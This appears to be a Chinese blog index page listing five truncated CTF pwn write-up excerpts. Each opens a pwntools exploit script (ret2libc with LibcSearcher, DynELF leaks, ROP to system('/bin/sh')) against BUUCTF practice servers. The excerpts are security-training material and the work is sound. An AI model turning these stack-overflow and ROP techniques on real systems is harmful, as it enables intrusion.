摘要:
找不到libc文件 用LibcSearcher模块 from pwn import * from LibcSearcher import * context.log_level='debug' r=remote('node3.buuoj.cn',28426) #r=process('./bjdctf 阅读全文
摘要:
直接调用if里面的函数,但是本地可以通,远程却打不通 from pwn import * #r=remote('node3.buuoj.cn',25775) r=process('./get_started_3dsctf_2016') get_flag=0x80489b8 payload='a'*0 阅读全文
摘要:
利用pwntools的DynELF from pwn import * r=remote('node3.buuoj.cn',29392) e=ELF('./2018_rop') write_plt=e.plt['write'] read_plt=e.plt['read'] main_addr=e.s 阅读全文
摘要:
程序已经给了system和binsh ,用寄存器传参就可以了 from pwn import * r=remote('node3.buuoj.cn',25737) elf=ELF('./babyrop') system_addr=elf.symbols['system'] binsh_addr=0x 阅读全文
摘要:
仰望一下大佬 from pwn import * r=remote('node3.buuoj.cn',29989) elf=ELF('./bof') read_addr=elf.symbols['read'] write_addr=elf.symbols['write'] main_addr=0x8 阅读全文